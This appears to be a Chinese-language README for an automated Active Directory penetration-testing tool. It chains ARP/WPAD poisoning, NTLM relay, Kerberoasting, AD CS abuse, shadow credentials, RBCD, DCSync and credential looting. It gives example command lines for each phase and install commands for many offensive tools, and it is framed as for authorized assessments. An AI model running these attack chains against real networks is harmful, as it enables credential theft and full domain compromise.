自动化 Active Directory 攻击链,从零认证到域管理员。串联 25 种以上技术,包括 Kerberoast、AD CS ESC1-16、Shadow Credentials、RBCD、DCSync 和 Synacktiv 2026 反射漏洞利用。仅限授权渗透测试。
从零认证到域管理员 — 自动化Active Directory攻击链
一个完全自动化的渗透测试工具,串连25+种攻击技术以入侵Active Directory环境。专为授权的安全评估而设计。
_ ___ _ _ ___
/_\ | \ /_\ _ _| |_ ___| _ \__ __ ___ _
/ _ \| |) | / _ \ || | _/ _ \ _/\ V V / ' \
/_/ \_\___/ /_/ \_\_,_|\__\___/_| \_/\_/|_||_|
⚡ Zero-Auth to Domain Admin — Attack Chain
Discover | Sniff | ARP | WPAD | WSUS | PXE | AD CS | SCCM | Roast
BloodHound | Reflect | Loot | RBCD+KCD | DCSync | DPAPI
DONT_REQ_PREAUTH 的账户获取免费哈希)--spray-password 选择启用).library-ms / .theme / .url 文件bloodhound-python -c All 收集 + ZIP 分析WriteSPN、AddKeyCredentialLink、GenericAll/Write、WriteDacl/Owner、WriteAccountRestrictions、AddAllowedToAct、ForceChangePasswordWriteSPN → ghost-SPN 升级(CVE-2025-58726)AddKeyCredentialLink → 影子凭证 → PKINIT → NT 哈希GenericAll / WriteAccountRestrictions on Computer → RBCD 链 → 管理员 TGS-altservice 重写,单阶段完成-altservice 内联$ 后缀,从而为 Linux 用户通过自动创建的 <user>$ 机器账户获取 TGT → GSSAPI SSHnxc -x 执行 Get-CimInstance Win32_Process;正则匹配密码(mysql/sqlcmd/runas/KeePass/--password 类型标志)C:\Users 中查找 *.kdbx,通过 smbclient 下载,keepass2john | hashcat -m 13400# 完全自动化 — 零凭证链(自动发现一切)
sudo ./ad-autopwn.py
# 有凭证 — 完整链
./ad-autopwn.py -u jsmith -p 'P@ss123' -d corp.local --dc-ip 10.0.0.1
# AWS / VPC 实验室(二层攻击被阻断)— 自动发现仍有效
sudo ./ad-autopwn.py --no-arp --no-wpad
# 预认证凭证发现(防锁定)
sudo ./ad-autopwn.py --phase discover --no-arp --no-wpad
# BloodHound 图收集 + 自动高价值分析
./ad-autopwn.py --phase bloodhound -u user -p pass -d corp.local \
--dc-ip 10.0.0.1 --dc-fqdn dc01.corp.local
# Dollar Ticket — 通过自动创建的 root$ 机器账户为 'root' 获取 TGT
./ad-autopwn.py -u user -p pass -d corp.local --dc-ip 10.0.0.1 \
--phase dollar-ticket --target-user root
# RBCD+KCD 链 — 完整 ghost-SPN + RBCD + altservice 重写,单次完成
./ad-autopwn.py -u user -p pass -d corp.local --dc-ip 10.0.0.1 \
--phase rbcd-kcd -T VHAGAR$ --alt-spn HTTP/vhagar.corp.local
# AppLocker 绕过
./ad-autopwn.py -u user -p pass --applocker --lolbin mshta --custom-cmd "whoami"
# 试运行(打印每条命令,不执行——包括后台进程)
./ad-autopwn.py --dry-run -u user -p pass -d corp.local --dc-ip 10.0.0.1
| 阶段 | 认证 | 描述 |
|---|---|---|
full | 可选 | 完整自动化链(有或没有凭证均自动检测) |
sniff | 无 | 被动 L2 流量发现 |
discover | 无 | kerbrute + CLDAP + AS-REP + pre2k + (可选)喷射 |
arp | 无 | ARP 欺骗 + NTLM 捕获 |
wpad | 无 | WPAD/LLMNR 投毒(mitm6 / Responder) |
wsus | 无 | WSUS NTLM 中继 |
pxe | 无 | PXE 启动凭证窃取 |
enum | 是 | 目标枚举(中继目标、无约束委派、WebClient 主机) |
enrich | 是 | nxc 13 模块电池(LAPS、timeroast、MAQ、nopac、zerologon 等)+ 自动消费者 |
bloodhound | 是 | bloodhound-python -c All + 分析 + 自动动作链 |
roast | 是 | Kerberoast + AS-REP Roast |
adcs | 是 | AD CS 利用(ESC1-ESC16) |
sccm | 是 | SCCM NAA 凭证窃取 |
exploit | 是 | 针对特定目标的 NTLM 反射/胁迫利用 |
dcsync | 是 (DA) | 域哈希转储 |
loot | 是 | 进程命令行收割 + KeePass 发现/破解 |
tgs-rewrite | 无 | 离线 ccache sname 重写(tgssub 风格 KCD 绕过) |
dollar-ticket | 是 | KDC $ 后缀重试攻击(Linux GSSAPI 目标) |
rbcd-kcd | 是 | 完整 RBCD+KCD 链编排器(WriteSPN → ghost → RBCD → S4U+altservice) |
reflect-tcpport | 是 | CVE-2026-24294 LPE 原语(SMB-on-tcpport) |
reflect-loopback | 是 | CVE-2026-26128 LPE 原语(通过 Unicode SPN 的 Kerberos 回环) |
kerb-reflect | 是 | CVE-2025-58726 ghost-SPN AP-REQ 反射 |
apt install python3 impacket-scripts netexec nmap hashcat tcpdump \
responder dsniff arp-scan certipy-ad bloodyad bloodhound.py \
smbclient atftp wimtools john seclists
git clone https://github.com/mverschu/CVE-2025-33073 /opt/tools/CVE-2025-33073
git clone https://github.com/dirkjanm/krbrelayx /opt/tools/krbrelayx
git clone https://github.com/Wh04m1001/DFSCoerce /opt/tools/DFSCoerce
git clone https://github.com/ShutdownRepo/ShadowCoerce /opt/tools/ShadowCoerce
git clone https://github.com/ShutdownRepo/pywhisker /opt/tools/pywhisker
git clone https://github.com/dirkjanm/PKINITtools /opt/tools/PKINITtools
git clone https://github.com/csandker/pxethiefy /opt/tools/pxethiefy
git clone https://github.com/garrettfoster13/sccmhunter /opt/tools/sccmhunter
git clone https://github.com/dirkjanm/mitm6 /opt/tools/mitm6
git clone https://github.com/Hackndo/pyGPOAbuse /opt/tools/pyGPOAbuse
git clone https://github.com/Hackndo/WebclientServiceScanner /opt/tools/WebclientServiceScanner
git clone https://github.com/almandin/Certihound /opt/tools/Certihound
pipx install coercer
pipx install wsuks --system-site-packages
kerbrute — 从 https://github.com/ropnop/kerbrute/releases 获取最新二进制文件 — 安装到 /usr/local/bin/userenum-cldap — 配套的 CLDAP NetLogon-ping 枚举器(位于本仓库的 userenum-cldap.py;安装到 /usr/local/bin/userenum-cldap)asn1tools — pip install asn1tools(CLDAP 枚举运行时依赖)# APT packages
sudo apt install python3 impacket-scripts netexec nmap hashcat tcpdump \
responder dsniff arp-scan certipy-ad bloodyad bloodhound.py \
smbclient atftp wimtools john seclists